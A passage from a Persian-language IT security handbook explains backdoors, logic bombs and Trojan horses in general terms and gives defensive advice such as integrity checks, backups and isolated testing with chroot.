‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﻣﺮﺍﺣﻞ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﺑﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪ .‬ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔـﻲ ﻭ‬
‫ﺗﻠﻪﻫﺎ ﺳﺎﻟﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺍﺳﺖ ﻛﻪ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻭ ﻋﻤﻮﻣﹰﺎ ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻬﺎ ﻭ ﺑﺮﺍﻱ ﺍﺷﻜﺎﻝﺯﺩﺍﻳﻲ ﻳﺎ ﻧﻈﺎﺭﺕ ﺑﺮ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﻛـﻪ ﻣـﻲﻧﻮﻳـﺴﻨﺪ‬
‫ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ‪.‬‬

‫‪325 Logic Bombs‬‬


‫‪326 Security Scanners‬‬
‫‪٤١٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺍﻛﺜﺮ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻫﻨﮕﺎﻡ ﺍﺟﺮﺍ ﻧﻴﺎﺯ ﺑﻪ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻃﻮﻻﻧﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻳﺎ ﻭﺭﻭﺩ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺯﻳﺎﺩ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ ﺯﻣﺎﻥ ﺍﺷﻜﺎﻝﺯﺩﺍﻳﻲ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺑﺨﻮﺍﻫـﺪ ﺍﺯ ﺩﺳﺘﺮﺳـﻴﻬﺎﻱ ﺧﺎﺻـﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺑﺎﺷـﺪ‪ ،‬ﻳـﺎ‬
‫ﻣﺮﺍﺣﻞ ﻃﻮﻻﻧﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻳﺎ ﻭﺭﻭﺩ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﻧﺠﺎﻡ ﻧﺪﻫﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﺻﻮﺭﺕ ﻛﺎﺭ ﻧﻜـﺮﺩﻥ ﺭﻭﺍﻟﻬـﺎﻱ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ‪ ،‬ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺑﺨﻮﺍﻫﺪ ﺍﺯ ﻃﺮﻳﻖ ﺧﻮﺩ ﺑﺮﻧﺎﻣﻪ ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺩﺭﺏ ﻣﺨﻔـﻲ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﺍﺳـﺖ‬
‫ﻛﻪ ﻳﺎ ﺑﺮ ﺍﺛﺮ ﻭﺭﻭﺩ ﻳﻚ ﺭﺷﺘﺔ ﺧﺎﺹ ﻭ ﻳﺎ ﺍﺟﺮﺍ ﺗﺤﺖ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺧﺎﺹ‪ ،‬ﻓﻌﺎﻝ ﻣﻲﺷﻮﺩ ﻭ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺍﻋﻄﺎ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻭﻗﺘﻲ ﺧﻄﺮﻧﺎﻙ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﻧﺎﺍﻫﻞ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ ﺷـﻮﻧﺪ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺍﻭﻟﻴﻪ ﭘﺲ ﺍﺯ ﺗﻜﻤﻴﻞ ﺑﺮﻧﺎﻣﻪ ﻓﺮﺍﻣﻮﺵ ﻛﻨﺪ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﺭﺍ ﺣﺬﻑ ﻛﻨﺪ ﻭ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﭘﻲ ﺑـﻪ ﻭﺟـﻮﺩ ﺁﻧﻬـﺎ‬
‫ﺑﺒﺮﺩ ﺍﻳﻦ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻣﺸﻜﻠﺴﺎﺯ ﻣﻲﺷﻮﻧﺪ‪ .‬ﮔﺎﻫﻲ ﻧﻴﺰ ﻳﻚ ﻣﻬﺎﺟﻢ ﭘﺲ ﺍﺯ ﻧﻔﻮﺫ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑﻪ ﺳﻴﺴﺘﻢ‪ ،‬ﻳﻚ ﺩﺭﺏ ﻣﺨﻔﻲ ﺩﺭ ﺁﻥ ﺍﻳﺠﺎﺩ‬
‫ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﻌﺪﹰﺍ ﺑﺘﻮﺍﻧﺪ ﺩﻭﺑﺎﺭﻩ ﺑﻪ ﺳﻴﺴﺘﻢ ﻭﺍﺭﺩ ﺷﺪﻩ ﻭ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪.‬‬
‫ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﺑﻬﺘﺮﻳﻦ ﺩﻓﺎﻉ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬـﻢ ﺭﺍ ﻣﺮﺗﺒـﹰﺎ ﺑﺮﺭﺳـﻲ‬
‫ﻛﻨﻴﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺑﺮﺭﺳﻲ ﻓﺎﻳﻠﻬﺎ‪ ،‬ﺑﺎﻳﺪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﻪ ﺩﻧﺒﺎﻝ ﻓﺎﻳﻠﻬﺎﻱ ﺍﻣﺘﻴﺎﺯﺩﺍﺭ ﻭ ﭘﻮﺭﺗﻬﺎﻱ ﺑﺎﺯ ‪ TCP/IP‬ﺑﮕﺮﺩﻳـﺪ ﻭ ﻣﺘﻨﺎﻭﺑـﹰﺎ ﻣﺠﻮﺯﻫـﺎ ﻭ‬
‫ﻣﺎﻟﻜﻴﺖ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﻣﻬﻢ ﺭﺍ ﻧﻴﺰ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻣﺮﻭﺯﻩ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﺣﺘﻲ ﻧﺸﺎﻧﻪﻫﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨـﺮﺏ ﺭﺍ‬
‫ﺑﺎ ﻇﺮﺍﻓﺖ ﺯﻳﺎﺩﻱ ﭘﻨﻬﺎﻥ ﻛﺮﺩ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺍﮔﺮ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﻜﺎﺭﻱ ﺷﻮﺩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻳﮕﺮ ﻫﺮﮔـﺰ ﻧﺘﻮﺍﻧﻴـﺪ ﻣﺘﻮﺟـﻪ ﺗﻐﻴﻴـﺮﺍﺕ‬
‫ﺑﻮﺟﻮﺩﺁﻣﺪﻩ ﺷﻮﻳﺪ‪.‬‬

‫ﺑﻤﺒﻬﺎﻱ ﻣﻨﻄﻘﻲ )ﺗﺨﺮﻳﺒﻬﺎﻱ ﺯﻣﺎﻧﺒﻨﺪﻱﺷﺪﻩ(‬


‫ﺑﻤﺒﻬﺎﻱ ﻣﻨﻄﻘﻲ ﺗﻬﺪﻳﺪﺍﺕ ﺯﻣﺎﻧﺒﻨﺪﻱﺷﺪﻩﺍﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻣﺪﺕﺯﻣﺎﻥ ﻃﻮﻻﻧﻲ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻌﻤﻮﻟﻲ ﭘﻨﻬﺎﻥ ﻣﻲﻣﺎﻧﻨﺪ‪ ،‬ﻭ ﺯﻣﺎﻧﻲ ﻛـﻪ‬
‫ﻻ ﺩﺭ‬
‫ﻓﻌﺎﻝ ﺷﻮﻧﺪ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻛﺎﺭﻱ ﺍﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﻣﻴﺰﺑﺎﻥ ﺁﻧﻬﺎ ﺍﻧﺠﺎﻡ ﻣﻲﺩﺍﺩﻩ ﺍﺳـﺖ‪ .‬ﺑﻤﺒﻬـﺎﻱ ﻣﻨﻄﻘـﻲ ﻣﻌﻤـﻮ ﹰ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻧﻲ ﭘﻴﺪﺍ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻗﺎﻧﻮﻧﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪.‬‬
‫ﺷﺮﺍﻳﻂ ﻓﻌﺎﻝﺷﺪﻥ ﺑﻤﺒﻬﺎﻱ ﻣﻨﻄﻘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻭﺟﻮﺩ ﻳﻚ ﻓﺎﻳﻞ ﺑﺨﺼﻮﺹ‪ ،‬ﻳﻚ ﺭﻭﺯ ﻣﺸﺨﺺ ﺍﺯ ﻫﻔﺘﻪ‪ ،‬ﻭ ﻳﺎ ﺑﻪ ﺍﺟـﺮﺍ ﺩﺭﺁﻣـﺪﻥ ﺗﻮﺳـﻂ ﻳـﻚ‬
‫ﻛﺎﺭﺑﺮ ﺧﺎﺹ ﺑﺎﺷﺪ‪ .‬ﺑﻤﺐ ﻣﻨﻄﻘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺑﺘﺪﺍ ﺑﺮﺭﺳﻲ ﻛﻨﺪ ﭼﻪ ﻛﺴﺎﻧﻲ ﺩﺭ ﺳﻴﺴﺘﻢ ﺣﻀﻮﺭ ﺩﺍﺭﻧﺪ ﻳﺎ ﭼـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﺩﺭ ﺣـﺎﻝ ﺍﺟـﺮﺍ‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﻳﻚ ﺑﻤﺐ ﻣﻨﻄﻘﻲ ﺩﺭﺻﻮﺭﺕ ﻓﻌﺎﻝﺷﺪﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ ﻳﺎ ﺍﺯ ﺑﻴﻦ ﺑﺒﺮﺩ‪ ،‬ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ‪ ،‬ﻳـﺎ ﺻـﺪﻣﺎﺕ‬
‫ﺺ ﻛﺎﺭﻣﻨـﺪﻱ‬‫ﺩﻳﮕﺮﻱ ﺑﻪ ﺳﻴﺴﺘﻢ ﻭﺍﺭﺩ ﺁﻭﺭﺩ‪ .‬ﻳﻚ ﻣﺜﺎﻝ ﻛﻼﺳﻴﻚ ﺑﺮﺍﻱ ﻓﻌﺎﻝﺷﺪﻥ ﻳﻚ ﺑﻤﺐ ﻣﻨﻄﻘﻲ ﺣﺎﻟﺘﻲ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺷﻤﺎﺭﺓ ﻣـﺸﺨ ﹺ‬
‫ﺑﺮﺍﻱ ﺩﻭ ﺩﻭﺭﺓ ﻣﺘﻮﺍﻟﻲ ﺩﺭ ﻣﺤﺎﺳﺒﺎﺕ ﺣﻘﻮﻕ ﻇﺎﻫﺮ ﻧﻤﻲﺷﻮﺩ )ﻳﻌﻨﻲ ﻭﻗﺘﻴﻜﻪ ﻛﺎﺭﻣﻨﺪ ﺷﺮﻛﺖ ﺭﺍ ﺗﺮﻙ ﻛﺮﺩﻩ ﺍﺳﺖ(‪.‬‬
‫"ﺍﺗﻤﺎﻡ ﺯﻣﺎﻥ ﺣﻴﺎﺕ" ﻧﻮﻉ ﺧﺎﺻﻲ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ﺑﻤﺒﻬﺎﻱ ﻣﻨﻄﻘﻲ ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﮔﺎﻫﻲ ﺑﺮﺍﻱ ﺍﺟﺒﺎﺭ ﭘﺮﺩﺍﺧﺖ ﭘﻮﻝ ﻳﺎ ﺍﻧﺠﺎﻡ ﺳﺎﻳﺮ ﻣﻔﺎﺩ ﻳﻚ ﻗﺮﺍﺭﺩﺍﺩ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺍﺗﻤﺎﻡ ﺯﻣﺎﻥ ﺣﻴﺎﺕ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﭘﺲ ﺍﺯ ﻳﻚ ﻣﺪﺕ ﺯﻣﺎﻥ ﻣﺸﺨﺺ‪ ،‬ﺍﮔﺮ ﻋﻤﻞ ﺧﺎﺻﻲ ﻣﺎﻧﻨﺪ ﭘﺮﺩﺍﺧﺖ ﻫﺰﻳﻨـﺔ‬
‫ﻻ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﺎﺭ ﮔﺬﺍﺷﺘﻪ ﻣـﻲﺷـﻮﺩ ﻛـﻪ ﺩﺭ ﻣﺮﺣﻠـﺔ‬ ‫ﻳﻚ ﮔﻮﺍﻫﻲ ﺍﻧﺠﺎﻡ ﻧﺸﻮﺩ‪ ،‬ﺑﺮﻧﺎﻣﻪ ﺩﻳﮕﺮ ﺍﺟﺮﺍ ﻧﻤﻲﮔﺮﺩﺩ‪ .‬ﺍﺗﻤﺎﻡ ﺯﻣﺎﻥ ﺣﻴﺎﺕ ﻣﻌﻤﻮ ﹰ‬
‫ﺁﺯﻣﻮﻥ ﻧﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺗﻮﺯﻳﻊ ﺩﺭ ﺑﺎﺯﺍﺭ ﻣﺼﺮﻑ ﻫﺴﺘﻨﺪ؛ ﺗﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺁﺯﻣﺎﻳﺸﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺍﺭﺗﻘﺎ ﺩﻫﻨـﺪ ﻳـﺎ ﻳـﻚ‬
‫ﻧﺴﺨﺔ ﺭﺳﻤﻲ ﺧﺮﻳﺪﺍﺭﻱ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺑﻤﺒﻬﺎﻱ ﻣﻨﻄﻘﻲ ﻣﺨﺮﺏ ﻧﻴﺰ ﻣﺸﺎﺑﻪ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﺍﺳﺖ‪ :‬ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﺑﺪﻭﻥ ﺧﻮﺍﻧﺪﻥ ﻭ ﺗـﺴﺖ ﻛﺎﻣـﻞ ﻧـﺼﺐ ﻧﻜﻨﻴـﺪ‪.‬‬
‫ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﺑﺮﻭﺯ ﻫﺮ ﺍﺗﻔﺎﻕ ﻧﺎﮔﻮﺍﺭ‪ ،‬ﺑﺘﻮﺍﻧﻴﺪ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ‪.‬‬

‫ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ‬
‫ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍﻱ ﺩﻧﻴﺎﻱ ﻣﺪﺭﻥ ‪ -‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺯ ﻧﺎﻣﺸﺎﻥ ﭘﻴﺪﺍﺳﺖ ‪ -‬ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﺷﺒﻴﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﺪ؛ ﻣﺜﻞ ﻳﻚ ﭘﺮﺩﺍﺯﺓ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ‪ ،‬ﻳﻚ ﺑﺎﺯﻱ‪ ،‬ﻳﺎ ﻳﻚ ﻭﻳﺮﺍﻳﺸﮕﺮ‪ .‬ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺑﺮﻧﺎﻣـﻪ ﺩﺭ ﻇـﺎﻫﺮ ﻛـﺎﺭ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺍﻧﺠـﺎﻡ‬
‫ﻼ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮ ﮔﻤﺎﻥ ﻛﻨﺪ ﻛﻪ ﻳـﻚ ﺑـﺎﺯﻱ‬ ‫ﻣﻲﺩﻫﺪ‪ ،‬ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﻛﺎﺭﺑﺮ ﺑﻪ ﻛﺎﺭ ﺩﻳﮕﺮﻱ ﺑﺮﺧﻼﻑ ﻫﺪﻑ ﺍﻋﻼﻡﺷﺪﻩ ﻧﻴﺰ ﻣﻲﭘﺮﺩﺍﺯﺩ‪ .‬ﻣﺜ ﹰ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٢٠‬‬

‫ﺍﺟﺮﺍ ﻛﺮﺩﻩ ﺍﺳﺖ ﻭ ﺑﺮﻧﺎﻣﻪ ﻧﻴﺰ ﺳﺆﺍﻻﺗﻲ ﻣﺎﻧﻨﺪ "ﺩﻭﺳﺖ ﺩﺍﺭﻳﺪ ﭼﻪ ﻧﺎﻣﻲ ﺭﻭﻱ ﺑﺎﺯﻳﻜﻦ ﺑﮕﺬﺍﺭﻳﺪ؟" ﻳﺎ "ﺩﺭ ﭼﻪ ﺳـﻄﺤﻲ ﺍﺯ ﺳـﺨﺘﻲ ﻣـﻲﺧﻮﺍﻫﻴـﺪ‬
‫ﻼ ﺩﺭﺣﺎﻝ ﭘﺎﻙﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎ ﻭ ﻗﺎﻟﺐﺑﻨﺪﻱ ﻣﺠﺪﺩ ﻳﻚ ﺩﻳﺴﻚ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻳﺎ ﺍﺳﻨﺎﺩ ﻣﺤﺮﻣﺎﻧﻪﺍﻱ ﺭﺍ ﺑـﻪ ﻳـﻚ‬ ‫ﺑﺎﺯﻱ ﻛﻨﻴﺪ؟" ﺍﺯ ﻭﻱ ﺑﭙﺮﺳﺪ‪ ،‬ﺍﻣﺎ ﻋﻤ ﹰ‬
‫ﻻ ﺑـﺎ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭ ﺁﻧﺴﻮﻱ ﺩﻧﻴﺎ ﺑﻔﺮﺳﺘﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺩﺭ ﺑﻌﻀﻲ ﻣﺤﻴﻄﻬﺎ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨـﺮﺏ ﻣﻌﻤـﻮ ﹰ‬
‫ﺣﻘﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﺑﻌﻨﻮﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺷﺪﻩ ﻣﻴﺎﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﺗﻮﺯﻳـﻊ‬
‫ﻣﻲﮔﺮﺩﻧﺪ‪.‬‬
‫ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺼﺐﻛﻨﻨﺪﻩ ﻧﻴﺰ ﺩﻳﺪﻩ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻮﺳﺘﻪ )ﺑﺨـﺼﻮﺹ ﻓﺎﻳﻠﻬـﺎﻱ ‪ ،(shar‬ﻓﺎﻳﻠﻬـﺎﻱ‬
‫‪ ،VBS‬ﻓﺎﻳﻠﻬﺎﻱ ‪ ،awk‬ﻓﺎﻳﻠﻬﺎﻱ ‪ ،perl‬ﻗﻄﻌﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ‪ ،sed‬ﻓﺎﻳﻠﻬـﺎﻱ ‪ ،TeX‬ﻓﺎﻳﻠﻬـﺎﻱ ‪ ،PostScript‬ﻧﺎﻣـﻪﻫـﺎﻱ ﺑـﺎ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬
‫‪ ،MIME‬ﻭ ﺻﻔﺤﺎﺕ ﻭﺏ‪ ،‬ﻫﻤﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺣﺎﻭﻱ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺎﺷﻨﺪ ﻛﻪ ﻣﺸﻜﻼﺕ ﻧﺎﺧﻮﺍﺳﺘﻪﺍﻱ ﺍﻳﺠـﺎﺩ ﻧﻤﺎﻳﻨـﺪ‪ .‬ﺣﺘـﻲ ﻓﺎﻳﻠﻬـﺎﻱ ﻣﺘﻨـﻲ ﻧﻴـﺰ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﻄﺮﻧﺎﻙ ﺑﺎﺷﻨﺪ‪ .‬ﺑﻌﻀﻲ ﻭﻳﺮﺍﻳﺸﮕﺮﻫﺎ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﭼﻨﺪ ﺧﻂ ﺍﺑﺘﺪﺍﻳﻲ ﻳﺎ ﺍﻧﺘﻬﺎﻳﻲ ﻓﺎﻳﻞ‪ ،‬ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑـﺮﺍﻱ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ‬
‫ﺧﻮﺩﻛﺎﺭ ﻭﻳﺮﺍﻳﺸﮕﺮ ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪) .‬ﺑﺮﺍﻱ ﺍﻃﻼﻉ ﺍﺯ ﺭﻭﺵ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﺑﻪ ﻣﺴﺘﻨﺪﺍﺕ ﻭﻳﺮﺍﻳﺸﮕﺮ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ﺧـﻮﺩ‬
‫ﺭﺟﻮﻉ ﻛﻨﻴﺪ‪(.‬‬
‫ﺍﮔﺮ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﺍﻱ ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻴﺪ ﻳﺎ ﻓﺎﻳﻠﻬﺎﻳﻲ ﺭﺍ ﻏﻴﺮﻓﺸﺮﺩﻩ ﻣﻲﻧﻤﺎﻳﻴﺪ‪ ،‬ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﻣﺎﺷـﻴﻦ ﻣﺠـﺰﺍ ﺩﺭ‬
‫ﻗﺮﻧﻄﻴﻨﻪ ﻳﺎ ﺩﺭ ﻣﺤﻴﻄﻲ ﻣﺤﺪﻭﺩ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﺗﺎ ﺟﻠﻮﻱ ﺩﺳﺘﺮﺳﻲ ﺁﻥ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷـﺎﺧﻪﻫـﺎﻱ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤـﻴﻂ ﻛـﺎﺭﻱ‬
‫ﺧﻮﺩﺵ ﺑﮕﻴﺮﻳﺪ )ﺩﺭ ‪ Unix‬ﺍﻳﻦ ﻛﺎﺭ ﺑﺎ ﺩﺳﺘﻮﺭ ﺳﻴﺴﺘﻤ ﹺﻲ )(‪ chroot‬ﺍﻧﺠﺎﻡ ﭘﺬﻳﺮ ﺍﺳﺖ‪(.‬‬
